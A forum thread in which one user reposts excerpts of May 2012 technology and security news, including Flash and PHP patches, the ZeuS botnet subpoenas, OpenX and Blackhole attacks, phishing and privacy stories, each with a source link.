Friday, Adobe confirmed that it has, in fact, enabled Flash silent updates for Windows in this instance.

A Computerworld Windows 7 system, however, was not silently updated to 11.2.202.235, the patched version within an hour of booting the PC, the interval the tool uses to check for new updates. Adobe's explanation: It did not begin serving Flash Player via silent update until about 10:30 a.m. PT, after the Windows 7 machine had pinged Adobe's servers. If the silent updater receives no response from Adobe, it waits 24 hours before trying again.

More at :-
http://www.computerworld.com/s/article/9226892/Ado...

--
Was this reply relevant?
+0
-0
mogs CClip 29
Expert Contributor 5th May, 2012 11:10
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Study Finds Child Identity Theft on the Rise

According to AllClear ID, identity theft affecting children ages five and under grew by 105 percent since last year.

By Jeff Goldman

According to a recent study from AllClear ID, fully 10.7 of children are victims of identity theft, making them 35 times more likely than adults to have their identities stolen.

"The new data also showed that identity theft is increasing most quickly in young children," Help Net Security reports. "In fact, identity theft among children ages 5 and under grew 105 percent since last year -- the highest growth rate of any age group -- while 26 percent of children targeted were between the ages of six and ten, a 34 percent increase."

"Meanwhile, growth rates for kids over 11 remained flat, which indicates that criminals are now going after the SSNs of ever younger children," writes TechCrunch's Sarah Perez.

"Young children have become a popular target for criminals because they 'present a clean slate,'" writes MidlandsConnect.com's Kara Durrette. "Their identities are not tied to credit cards, student loans, or other lines of credit, which means loss can go undetected for years, according to the report."

"It's important for parents to understand that child ID theft is a real and growing trend," AllClear ID CEO Bo Holland said in a statement. "Rather than letting this trend continue, consumers -- parents especially -- should take the necessary precautions to ensure the safety of their child's livelihood."

http://www.esecurityplanet.com/hackers/study-finds...

--
Was this reply relevant?
+0
-0
mogs CClip 30
Expert Contributor 5th May, 2012 19:56
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Google Notifies ZeuS Botmasters That Microsoft Is Coming for Them Google has started sending notifications to the individuals that Microsoft appointed as being behind the ZeuS botnet they've disrupted. Some applaud this decision, while others say that the company’s “one-size-fits-all” privacy policy isn’t the best way to handle things.

Microsoft’s recent takedown of the ZeuS botnet has caused a lot of controversy, mostly because of the way the company addressed the issue.

In April, security journalist Brian Krebs reported that a large part of the security industry blamed Microsoft for using sensitive information for its own agenda without explicit permission from the source, possibly even interfering with the investigations of international law enforcement organizations.

The other problem was that the Redmond company made a deal with a federal judge that would allow it to seize domain names and servers in return for trying to reveal the identities of the suspected cybercriminals.

Now, Krebs reveals that at least 15 of the individuals had email accounts on Hotmail or MSN, which were not a problem to track down, but among the other ones, 39 John Does owned Google accounts.

When Microsoft requested Google to hand over the account information, Google’s privacy policy kicked in and, as a result, all the individuals received notices.

“Google has received a subpoena for information related to your Google account in a case entitled Microsoft Corp., FS-ISAC, Inc. and NACHA v. John Does 1-39 et al., US District Court, Northern District of California, 1:12-cv-01335 (SJ-RLM) (Internal Ref. No. 224623),” reads part of the notice sent by Google.

“To comply with the law, unless you provide us with a copy of a motion to quash the subpoena (or other formal objection filed in court) via email at google-legal-support@google.com by 5pm Pacific Time on May 22, 2012, Google may provide responsive documents on this date.”

While many may applaud Google’s decision to stick to its privacy policy, there are some who believe that the company should have taken the time to check if the customers in question deserved the heads-up.

Jon Praed, founding partner of Internet Law Group, has stated that Microsoft should have done a better job in respecting the community, but on the other hand he welcomes the efforts the firm has placed into this operation.

“Privacy needs lots of attention as an issue, and it is clearly true that the average, law-abiding citizen is generally woefully protected wrt privacy,” Praed wrote in a comment to Krebs’ article.

“However, it is also true that the average bad guy is vastly over-protected by simplistic applications of privacy policies that were written, not to protect the bad guy, but to protect the rest of us. Privacy policies need exceptions, and the general public needs to understand enforcing those exceptions are sometimes as important as enforcing the general rule.”

http://news.softpedia.com/news/Google-Notifies-Zeu...

--
Was this reply relevant?
+0
-0
mogs CClip 31
Expert Contributor 6th May, 2012 08:07
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Bodleian uses crowd-sourcing to catalogue music collection The Bodleian Library is asking the public for help in cataloguing one of its collections. As part of a new project, members of the public are being asked to help describe 4,000 music pieces from the Bodleian Libraries' collections.
What's the score at the Bodleian? is the first crowd-sourcing project undertaken by the Bodleian Libraries. About 4,000 pieces of popular piano music from the mid-Victorian period have been digitized and made available online. The music was mostly produced for domestic entertainment, and many of these scores have illustrated or decorative covers and advertisements. The collection has never been included in the library’s catalogue, and its exact contents are therefore unknown.
By visiting the website, 'citizen librarians' can help by describing the scores and contributing to the creation of an online catalogue. Members of the public – with or without musical backgrounds – will be given images of the scores, which they can catalogue by submitting an online form describing the item. The project will also encourage performances of this music and will aim to provide links to audio or video recordings.

Read more at :-
http://phys.org/news/2012-05-bodleian-crowd-sourci...

--
Was this reply relevant?
+0
-0
mogs CClip 32
Expert Contributor 6th May, 2012 08:13
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Email 'vacations' decrease stress, increase concentration, researchers say

Being cut off from work email significantly reduces stress and allows employees to focus far better, according to a new study by UC Irvine and U.S. Army researchers.
Heart rate monitors were attached to computer users in a suburban office setting, while software sensors detected how often they switched windows. People who read email changed screens twice as often and were in a steady "high alert" state, with more constant heart rates. Those removed from email for five days experienced more natural, variable heart rates.

More at :-
http://phys.org/news/2012-05-email-vacations-decre...

--
Was this reply relevant?
+0
-0
mogs CClip 33
Expert Contributor 6th May, 2012 08:19
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Nearly 13 Million U.S. Facebook Users Fail to Use Privacy Controls

A Consumer Reports study has found that many members share sensitive data that could be used against them.

By Jeff Goldman | May 04,

According to a recent report from Consumer Reports, almost 13 million U.S. Facebook users either don't use any privacy controls or aren't aware that they're available.

"The magazine also reported that a significant number of members have shared potentially sensitive information that could be used against them," writes The Chicago Tribune's Wailin Wong. "For example, 4.7 million have clicked 'Like' on pages about health conditions or treatments, which Consumer Reports said 'an insurer might use against you.' And 20.4 million included their birth date and year in their profile."

"Facebook really is changing the way the world socially communicates and has become a successful service in part by leveraging copious amounts of personal data that can be spread far wider than its users might realize," Consumer Reports technology editor Jeff Fox said in a statement. "Our investigation revealed some fascinating, and some disquieting trends -- but ones always worth knowing for consumers who wish to keep their personal data under better control."

More at :-
http://www.esecurityplanet.com/network-security/ne...

--
Was this reply relevant?
+0
-0
mogs CClip 34
Expert Contributor 6th May, 2012 08:31
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
OpenX Plans Fix for Security Flaw

Company CTO Michael Todd says a new version will be released early next week.

By Jeff Goldman

Krebs on Security's Brian Krebs reports that hackers are actively exploiting an unpatched vulnerability in the OpenX ad server solution in order to run ads that serve malware and browser exploits.

"Security experts have been warning for months about mysterious attacks on OpenX installations in which the site owners discovered new rogue administrator accounts," Krebs writes. "That access allows miscreants to load tainted ads on sites that rely on the software. The bad ads usually try to foist malware on visitors, or frighten them into paying for bogus security software. OpenX is only now just starting to acknowledge the attacks, as more users are coming forward with unanswered questions about the mysteriously added administrator accounts."

"The first compromised systems were discovered by Infosec researcher Mark Baldwin, who found that attackers were exploiting a cross-site request forgery (CSRF) vulnerability to create a malicious 'openx-manager' account on affected systems and then started serving ads with malicious payloads via the OpenX platform," The H Security reports. "This account gets created by JavaScript executed when a legitimate administrator logs into the advertising platform and is served an ad in the administration interface that comes from OpenX's own advertising servers."

Krebs says OpenX CTO Michael Todd hopes to roll out an official fix as soon as possible -- in the interim, Todd has posted a list of steps for users to take to protect their systems. "What we’re going to do early next week -- on Monday or Tuesday -- is release a new version of OpenX for people to download as soon as possible," Todd said. "We’re taking an extra few days to make sure that this gets done correctly and that we’re doing all the testing we need to do before we push that out."

http://www.esecurityplanet.com/network-security/op...

--
Was this reply relevant?
+0
-0
mogs CClip 35
Expert Contributor 6th May, 2012 08:39
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Intel and McAfee unveil plans for unified security future

After 18 months, the results are in
By Iain Thomson in San Francisco

Posted in Cloud, 5th May 2012 02:01 GMT
Intel and MacAfee have been talking about the fruits of their merger and their plans for a cloud to computer security network that will be built into new systems.

Jason Waxman, general manager of Intel's Cloud Infrastructure Group, said that over the last year or so he'd been inundated with questions about what Intel was going to do with McAfee since it lashed out $7.68bn for the security firm, during an industry-wide buying spree on cyber-security companies. Chipzilla's been intentionally quiet on the subject, but was now ready to talk he said.

What Intel is planning is a cloud to desktop security strategy, mixing hardware and software features in a federated framework designed to make cloud computing safer, locking down the desktop and, coincidentally, giving IT managers another reason to specify Intel's systems during the next upgrade cycle.

More at :-
http://www.theregister.co.uk/2012/05/05/intel_mcaf...

--
Was this reply relevant?
+0
-0
mogs CClip 36
Expert Contributor 6th May, 2012 08:44
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft ejects DVD playback from Windows 8

Netflix and licensing killed the video star
By Gavin Clarke

Posted in Operating Systems, 4th May 2012 11:01 GMT
Digital media playback in Windows 8 has fallen casualty to the savage economics of the PC industry and changing tastes in consumer viewing.

We knew Windows Media Center would be sold at extra cost in Windows 8, but Microsoft now says you won’t be able to play DVDs on Windows Media Player in Windows 8.

If you do want DVD playback, then it’ll be a case of shopping judiciously and picking a PC whose manufacturer has licensed the codecs from a third party.

The twist? Windows 8 customers will end up paying more than others, as PC makers will likely be compelled to license the required codecs themselves to enable DVD playback.

In the latest Windows 8 blog, Microsoft said:

Windows Media Player will continue to be available in all editions, but without DVD playback support. For optical discs playback on new Windows 8 devices, we are going to rely on the many quality solutions on the market, which provide great experiences for both DVD and Blu-ray.

More at :-
http://www.theregister.co.uk/2012/05/04/windows_me...

--
Was this reply relevant?
+0
-0
mogs CClip 37
Expert Contributor 6th May, 2012 09:13
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Try a free security suite with Bitdefender Total Security 2012
A 30-day trial version that enables you to test the software fully
Computeractive staff Download review Security 02/05/2012

Bitdefender's Auto Pilot tool keeps user management of PC security to the bare minimum

Bitdefender Total Security 2012 is the package that offers the company's highest level of protection against online threats, with the same ease of use that is built into its full range of security products.
This download gives home PC owners the chance to evaluate the software completely free of charge for 30 days.
Total Security 2012 features an Auto Pilot mode that takes the hassle out of maintaining online security, with no pop-ups, no alerts and nothing to configure.
For those who prefer to manage PC security themselves, Total Security 2012 offers plenty of flexible tools, including parental controls that keep mum and dad in charge of the PC.
Whether you decide to switch Auto Pilot on or off, Bitdefender's social media filtering tools will block suspicious links in Facebook and Twitter windows, as well as blocking ID theft attempts.
As a free trial of the full software rather than a feature-restricted version, this download is worthy of our Try It award. You can also read our full and independent review of Bitdefender Total Security 2012.


Read more: http://www.computeractive.co.uk/ca/download-review...


--
Was this reply relevant?
+0
-0
mogs CClip 38
Expert Contributor 6th May, 2012 09:20
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Will my router keep working once IPv6 has launched later this year?
The latest internet protocol, IPv6, is due this summer, however this should not cause any lack of accessibility to websites for those using IPv4 equipment
Computeractive staff PC help Broadband 01/05/2012

The big changeover to IPv6 is on 6 June this year
Q I have just read about the World IPv6 Launch day, which is scheduled for 6 June 2012. I used a recommended program to test my setup for compatibility and I have discovered that my router does not support IPv6 connectivity.
Does this mean that after 6 June I will not be able to access the internet as fully as I do now? From what I’ve read it seems there will be sites that only support IPv6 and that I will not see these, thus reducing my access.
My internet service provider (ISP) says I can overcome this problem by buying a new router but I am paying for its top broadband service. It seems to me that if this is correct I would be better off by changing my service.
Howard Angel
A We would have to devote several pages of the magazine to answer this question in detail (and indeed, we’ll do that as IPv6’s launch draws close – so look out for the article). So the short answer is that, for the near future at least, you have little to worry about.
When the IPv6 protocol launches later this year, IPv4 equipment will continue to work as normal. In the longer term – and we are talking years – it is possible that your router will be unable to access certain websites, so you may wish to consider a replacement.
If you object to having to spend this money then we’re sure that by the time it becomes a problem, all new routers – including those supplied by ISPs as part of a broadband package – will offer comprehensive support for IPv6.


Read more: http://www.computeractive.co.uk/ca/pc-help/2155992...


--
Was this reply relevant?
+0
-0
mogs CClip 39
Expert Contributor 6th May, 2012 09:27
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Check your documents and essays for style, content and plagiarism
A free service can check the spelling, grammar, content and style of your documents. It can also tell if you've been using someone else's words
Computeractive staff Step by step Web 02/05/2012

One of the beauties of the Paper Rater service is that there’s nothing to sign up to or download – just fire up a web browser and visit the Paper Rater website. When the site appears, have a look round to see what’s on offer. Notice that there’s a Pricing button at the top of the page: all the features on the site are free, though a paid-for ‘premium’ service is set to launch. However, we’ll be focusing solely on the free tools. When you’re ready to start, click the Use Now FREE button to get going.


Read more: http://www.computeractive.co.uk/ca/step-by-step/21...


--
Was this reply relevant?
+0
-0
mogs CClip 40
Expert Contributor 6th May, 2012 21:24
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Chrome App Translates Portions of Pages So You Can Learn While Browsing There are plenty of ways of learning a new language, but none are as good as living in a place where everyone speaks it around you. Of course, moving to a new country probably isn't the most efficient way of picking up a new language.

Immersion for Chrome helps to solve the problem by surrounding you with the foreign language of your choosing while you surf.

It leverages Google Translate and actively replaces words or even entire sentences in the articles you read online with their foreign translation.

You can choose between a Novice level, which replaces only a few words, all the way up to Fluent which replaces big portions of text. It's surprisingly easy and effective in practice.

You can even set it to speak the translated parts so you can hear how they're pronounced as well.

http://news.softpedia.com/news/Chrome-App-Substitu...

--
Was this reply relevant?
+0
-0
mogs CClip 41
Expert Contributor 7th May, 2012 11:08
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Apple engineering mistake exposes clear-text passwords for Lion
An attacker could potentially decrypt information secured with an older version of FileVault, Apple's encryption technology

By Jeremy Kirk
May 6, 2012 09:47 PM ET
IDG News Service - Apple's latest update to OS X contains a dangerous programming error that reveals the passwords for material stored in the first version of FileVault, the company's encryption technology, a software consultant said.

David I. Emery wrote on Cryptome that a debugging switch inadvertently left on in the current release of Lion, version 10.7.3, records in clear text the password needed to open the folder encrypted by the older version of FileVault.

Users who are vulnerable are those who upgraded to Lion but are using the older version of FileVault. The debug switch will record the Lion passwords for anyone who has logged in since the upgrade to version 10.7.3, released in early February.

More at :-
http://www.computerworld.com/s/article/9226916/App...

--
Was this reply relevant?
+0
-0
mogs CClip 42
Expert Contributor 7th May, 2012 11:15
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Hackers Blackmail Symantec, Claim to Have Norton Internet Security 2012 Code

On May 4, a group of hackers calling itself “l3g4nd crew” claimed to be in possession of Symantec’s Norton Internet Security 2012 source code. They tried to blackmail the security firm, but Symantec representatives determined that the code was not from their products.

This is not the first time when Symantec is blackmailed by hackers. A few weeks ago, a similar incident took place. At the time, the company sought help from US law enforcement in an attempt to unmask the hacker.

If back then the hackers claimed to be hacktivists that wanted to teach Symantec a lesson, this time the blackmailers seem to be in it purely for the money.

“We would like to inform you that we finally exploited Norton internet security 2012, this exploit made an error in Norton and by mistake exposed its FULL SOURCE CODE, we then checked it several time to be sure, also we would like to tell you that you fool highness inserted a lot of sensitive information in the code,” the hackers wrote.

“We actually disclosed the top secret virus protection technique of Symantec Norton 2012 and we will be publishing it on Monday unless we had a little t$lk, the source code will also be published on several paste websites including this site.”

They threatened that the code would be leaked on Monday, which is today, if their “demand$” were not met.

However, according to Infosec Island, Symantec denies that the source code is from Norton Internet Security 2012. Senior Manager for Corporate Communications at Symantec, Cris Paden, has revealed that the code comes from a “utility designed to keep Microsoft Office 2010 in a perpetual trial mode.”

Read more at :-
http://news.softpedia.com/news/Hackers-Blackmail-S...

--
Was this reply relevant?
+0
-0
mogs CClip 43
Expert Contributor 7th May, 2012 11:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Internet group: Quality over speed in new domains
May 6, 2012 By ANICK JESDANUN , AP Technology Writer
(AP) -- The organization in charge of expanding the number of Internet address suffixes - the ".com" part of domain names - is apologizing for delays but says it's favoring "quality, not speed."
Three weeks ago, the Internet Corporation for Assigned Names and Numbers abruptly shut down a system for letting companies and organizations propose new suffixes, after it discovered a software glitch that exposed some private data. At the time, ICANN planned to reopen the system within four business days. The system remains suspended indefinitely.
"We've very focused on the quality of what we do," ICANN CEO Rod Beckstrom said. "We take this very seriously. That's why we're moving very methodologically and professionally."
In an interview with The Associated Press this week, Beckstrom added, "We apologize for the delay, but we're committed to getting this right."
ICANN has said it needed time to figure out why the software failed and how to fix it. That was completed last week, Beckstrom said, but ICANN still must undergo extensive testing on the fixes and inform companies and organizations whose data had been exposed. He declined to offer a timetable; ICANN said Friday that it planned to provide an update after Tuesday.
Up to 1,000 domain name suffixes could be added each year in the most sweeping change to the domain name system since its creation in the 1980s.

More at :-
http://phys.org/news/2012-05-internet-group-qualit...

--
Was this reply relevant?
+0
-0
mogs CClip 44
Expert Contributor 7th May, 2012 17:06
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Security App of the Week: M Portable Anti-Copy

Software programmer Mohsen Ektefa introduces “M Portable Anti-Copy,” an application that can be used to protect content stored on portable storage devices such as USB memory sticks, or portable hard drives. The software represents a great way for copyright holders to protect their assets.

“This is the first and the only software in the world that can protect your files from copy, cut, upload and attach on a portable storage device,” the developer told us.

“So if you are a file owner, you can protect your files using M Portable Anti-Copy and save them directly into your portable storage, and sell it to your customers. Then, only your customers can run the files on the portable storage and if any user copies the files from the portable disks to her/his storage and run them, they will delete automatically.”

For instance, if someone wants to commercialize e-books on USB memory sticks, he/she can make sure that only the individual that possesses the drive can read it.

Read more at :-
http://news.softpedia.com/news/M-Portable-Anti-Cop...

--
Was this reply relevant?
+0
-0
mogs CClip 45
Expert Contributor 7th May, 2012 17:16
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Adobe preps silent Flash updates for Macs
Flash Player 11.3 hits beta 3; final to ship before end of June

By Gregg Keizer | Computerworld US | 07 May 12
Adobe last week released a new beta of Flash Player that includes silent updates for Macs.

Adobe first included silent updates for OS X in the Flash Player beta a month ago; the version shipped Friday was tagged as "Beta 3."

Adobe introduced silent updates for Flash Player on Windows in late March. At the time, the company committed to creating the same feature on OS X, but did not set a timetable.

As far as users are concerned, the Mac version is identical to the Windows tool: It pings Adobe's servers every hour until it gets a response. If it reaches Adobe and finds no ready update, the tool re-checks the servers 24 hours later. Found updates, however, are applied entirely in the background, and do not display notices on the screen or require the user to take any action.

By default, Flash 11.3 has silent updates switched on, but users can change the setting to continue to receive on-screen alerts.

Read more: http://www.pcadvisor.co.uk/news/security/3356030/a...

--
Was this reply relevant?
+0
-0
mogs CClip 46
Expert Contributor 7th May, 2012 17:21
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
PHP working on new patch for critical vulnerability after initial one failed
Upcoming PHP updates will address two known remote code execution vulnerabilities

By Lucian Constantin | 07 May 12
The PHP Group plans to release new versions of the PHP processor on Tuesday in order to patch two publicly known critical remote code execution vulnerabilities, one of which was improperly addressed in a May 3 update.



Read more: http://www.pcadvisor.co.uk/news/security/3356029/p...

--
Was this reply relevant?
+0
-0
mogs CClip 47
Expert Contributor 7th May, 2012 21:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
OpenID-Style Websites Trick Users into Handing Over Credentials

Barracuda Labs experts have come across spam emails that lure users to a malicious site that tries to replicate a service similar to OpenID, hoping to gain the trust of potential victims.

OpenID is considered to be a practical solution by many website owners because it saves them the hassle of creating their own user accounts, and instead, allows the customers to log in with credentials utilized to access other sites, such as Yahoo, Gmail, Twitter, or Facebook.

Cybercriminals rely on the fact that many people don’t know how the procedure works, so they may be tempted to provide their credentials without giving it too much thought.

Usually, the schemes start with an apparently innocent email that informs the recipient about a real estate deal, or a package delivery notification. When the link from the message is clicked, the user is taken to a fake OpenID login site.

Once the service is selected, a login screen that partly imitates the legitimate one appears.

After the victims enter their credentials and press the Sign In button, the username and password are immediately transferred, in plain text, to a server controlled by the cybercriminals. To avoid raising suspicion, a redirect then occurs to a legitimate site.

At this point, it doesn’t matter if the victim handed over Facebook, Gmail, AOL, Yahoo, or Windows Live login details. Any one of them can be worth just as much to the scammers.

Users are advised to keep in mind that websites that utilize OpenID always redirect to the legitimate secure domain. For instance, if you choose to sign in to your Yahoo account, you will be taken to the company’s genuine site.

When presented with something similar to the screenshot, you can be almost certain that it’s a phishing operation.

http://news.softpedia.com/news/OpenID-Style-Websit...



--
Was this reply relevant?
+0
-0
mogs CClip 48
Expert Contributor 8th May, 2012 16:36
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

So many recent exploits have used Java as their attack vector, you might conclude Java should be shown the exit

By Roger A. Grimes | InfoWorldFollow @rogeragrimes

Java's direct responsibility in the recent Mac Flashback Trojan attacks have many calling for Java's retirement, including InfoWorld's own Woody Leonhard.

It's understandable. Unpatched Java is responsible for sizable proportion of today's successful Internet browser attacks, including two compromises I've suffered over the last couple of years. It's also been the culprit behind nearly every Windows exploit that's affected friends and family, aside from the pure social engineering exploits from phishing, Craigslist scams, and so on.

[ Also on InfoWorld: Woody Leonhard makes the case for dumping Java. Do you agree? | InfoWorld's expert contributors show you how to secure your Web browsers in this "Web Browser Security Deep Dive" PDF guide. | Keep up with key security issues with the Security Central newsletter. ]

Those anecdotal experiences are backed up by good data. Microsoft's Security Intelligence Report 11 shows Java exploits are by far the biggest ongoing problem impacting monitored Windows computers. Java has been bedeviled by hundreds of security vulnerabilities over time. Go to any security vulnerability database and you'll see dozens of bug fixes each year since Java's creation in 1995. You'd be hard-pressed to find any single application that has hosted as many security bugs as Java.

Banishing Java: Easier said than done
Is it time for Java to go? Should we recommend that people disable or remove it? Like most problems in life, the answer isn't an easy yes or no.

One thing is certain: Any software not in use, including Java, should be removed from your system. That's common sense -- and a long-recommended security tenet. It reduces the attack surface for exploits and their creators.

But many enterprises live and thrive on Java -- both pure Java programs and runtime applets running in the browser. They can't remove it. Personally, I've removed Java a few times over the years, though many websites and services I love (like Secunia's Online Software Inspector) require Java. There are enough cool and useful services that depend on Java that I end up reinstalling it.

Read more at :-
http://www.infoworld.com/d/security/why-you-cant-d...

--
Was this reply relevant?
+0
-0
mogs CClip 49
Expert Contributor 8th May, 2012 19:36
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Adobe Patches Critical Flash Player Security Flaw

All users are urged to update to version 11.2.202.235.

By Jeff Goldman | May 07, 2012
Adobe Systems recently released security updates for Adobe Flash Player for Mac, Windows and Linux. "These updates address an object confusion vulnerability (CVE-2012-0779) that could cause the application to crash and potentially allow an attacker to take control of the affected system," the company stated in a security bulletin published on Friday.

"It’s recommended that users of Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Mac and Linux update to Adobe Flash Player 11.2.202.235," writes Forbes' Adrian Kingsley-Hughes. "You can do this by visiting Adobe’s Flash Player update portal."

"The company said the vulnerability ... has been exploited in targeted attacks designed to trick the user into clicking on a malicious file delivered in an email message, and that the exploit used in the attacks seen so far target Flash Player on Internet Explorer for Windows only," writes Krebs on Security's Brian Krebs.

"For the exploit to successfully work, the malicious attachments need to be opened on a computer with a vulnerable version of Adobe Flash Player," Symantec reports. "The malicious documents contain an embedded reference to a malicious Flash file hosted on a remote server. When the Flash file is acquired and opened, it sprays the heap with shellcode and triggers the CVE-2012-0779 exploit. Once the shellcode gains control, it looks for the payload in the original document, decrypts it, drops it to disk, and executes it. Symantec detects this payload as Trojan.Pasam."

"Vulnerabilities in Adobe's products in general and Flash Player in particular are often exploited by cyber attackers, so the company introduced silent automatic updating for Flash Player on Windows in March, and is working on releasing a stable Flash Player for Mac with the feature soon," writes Help Net Security's Zeljka Zorz.

http://www.esecurityplanet.com/patches/adobe-patch...

--
Was this reply relevant?
+0
-0
mogs CClip 50
Expert Contributor 8th May, 2012 19:51
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Windows 8 privacy worry overblown, says Microsoft analyst
By Taylor Armerding | CSO | 08 May 12
It sounds like a privacy hole big enough for a truckload of your personal information to be leaked to the world, but experts say a recently disclosed Windows 8 privacy issue is really a non-issue.

Microsoft's Windows 8, which connects its users with networks including Facebook, Flickr, Twitter, LinkedIn, Hotmail, Gmail, Exchange leaves a "lingering cache of automatically collected contacts [that] are stored unencrypted on a Windows 8 client," InfoWorld's Woody Leonhard reports this week.

"[Windows 8] doesn't build its Contacts list dynamically," Leonhard reports. "Instead, it keeps a cache of contacts from all of those sources stored on the machine. The cache persists even when the user logs off or the machine is turned off."

"That means anyone who can sign on to your PC with an administrator account can see all of your contacts and all of their data -- names, email addresses, pictures, telephone numbers, addresses," he writes.

Read more: http://www.pcadvisor.co.uk/news/security/3356327/w...

--
Was this reply relevant?
+0
-0
mogs CClip 51
Expert Contributor 8th May, 2012 20:03
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

British internet users are being targeted by a 'ransomware' campaign that locks people out of their computers unless they hand over the right amount of money.


Criminals posing as police are demanding money to unlock PCs. Image credit: Abuse.ch

Spotted by security blog Abuse.ch, the malware taps into an exploit kit known as 'Blackhole'. Sold underground, Blackhole is used by criminals to infect computers via security holes in a browser or in third-party plug-ins such as Java and Adobe Reader, Abuse.ch said in its post on Saturday.

If the version of Java, for example, is not up to date with the latest patches, the downloaded file will exploit the software's weakness by downloading a Trojan to the PC and then running it. Once the PC is infected, the user will receive a message on the screen saying that the computer has been locked for illegally downloading pirated music.

More at :-
http://www.zdnet.co.uk/news/security-threats/2012/...

--
Was this reply relevant?
+0
-0
mogs CClip 52
Expert Contributor 8th May, 2012 20:08
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Mozilla patches leaky add-ons issue
By Tom Espiner , 8 May, 2012 17:20

Security Bulletin
Analysis of security, technology, and attempts to filter random noise
Mozilla has patched a memory-consumption issue in Firefox caused by leaky add-ons, but has found the patch may not be 100 percent successful.

Mozilla developer Nicholas Nethercote tested a patch by fellow developer Kyle Huey for six add-ons, including McAfee SiteAdvisor 3.4.1, and found the patch reduced incidents of 'zombie compartments'.

However, the patch also caused code built with the Mozilla Add-on SDK to "leak badly". Developers are discussing the issue, Nethercote said in a blog post on Monday.

http://www.zdnet.co.uk/blogs/security-bulletin-100...

--
Was this reply relevant?
+0
-0
mogs CClip 53
Expert Contributor 8th May, 2012 22:05
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
FBI Wants Google, Facebook to Provide Wiretap Backdoor: Report

By: Nathan Eddy
2012-05-07

The FBI wants Facebook, Google and other large Internet companies to build in backdoors to allow wiretapping, CNET reports.

Just in case you weren’t paranoid enough about privacy and security on the Web, a CNET report has revealed that the Federal Bureau of Investigation is pressuring major Internet communications firms to build in backdoors that would allow the bureau to conduct wiretapping investigations. The report said the FBI fears its ability to conduct surveillance as more users employ Web-based communication and messaging services to talk to each other.

The news is unlikely to go down well with Internet freedom groups, which are already alarmed by government proposals to regulate and monitor the Internet. Some argue that building in such a backdoor would be a time-consuming and complex process. "New methods of communication should not be subject to a government green light before they can be used," Ross Schulman, of the Computer and Communications Industry Association, said in the report.

The report also mentions any wiretapping would require a court order before it could be initiated. “What the FBI is proposing is an amendment to the 1994 Communications Assistance for Law Enforcement Act, or CALEA, which would require communications platforms like Facebook and Web email programs like Gmail and Yahoo to build FBI-accessible backdoors into their services,” the article said.

More at :-
http://www.eweek.com/c/a/Security/FBI-Wants-Google...

--
Was this reply relevant?
+0
-0
mogs CClip 54
Expert Contributor 8th May, 2012 22:18
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Credit company hackers' ransom goes unpaid

Belgian company has reportedly ignored demands for payment to maintain security of customer details.
By Caroline Donnelly, 8 May 2012
A European credit company targeted by computer hackers has reportedly ignored demands for 150,000 Euros in ransom money to protect its customers' details.

Belgian credit provider Elantis has been warned by an unknown hacking group that, unless the ransom money is paid, its customers' confidential information will be published on the internet.

In a statement on text sharing website Pastebin, the group claimed to have obtained personal information belonging to customers that had applied for one of the company’s loans.

The group said they downloaded the details by hacking into Elantis’ servers, and claim the data was unencrypted.

Read more at :-
http://www.itpro.co.uk/640489/credit-company-hacke...

--
Was this reply relevant?
+0
-0
mogs CClip 55
Expert Contributor 9th May, 2012 08:15
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Dev Channel Update
Tuesday, May 8, 2012 | 18:05
Labels: Dev updates
The Dev channel has been updated to 20.0.1130.1 for Windows, Mac, Linux, and Chrome Frame. This build contains update for V8 - 3.10.8.4 and several stability fixes. Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
Was this reply relevant?
+0
-0
mogs CClip 56
Expert Contributor 9th May, 2012 08:20
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft makes good with a 23-fix Patch Tuesday

Busy Wednesday for BOFH
By Iain Thomson in San Francisco
Posted in Security, 9th May 2012 00:48 GMT
It'll be all hands to the pumps in IT departments around the globe as Microsoft has issued this month's round of patches. There are 23 flaws to be fixed.

The seven patches include three critical issues, affecting Microsoft Windows, Office, Silverlight, and the .NET Framework. One patch, MS12-034, is specifically aimed at fixing possible attack vectors for the Duqu malware that Redmond initially blocked in December. It sorts ten flaws, some of which are publicly disclosed.

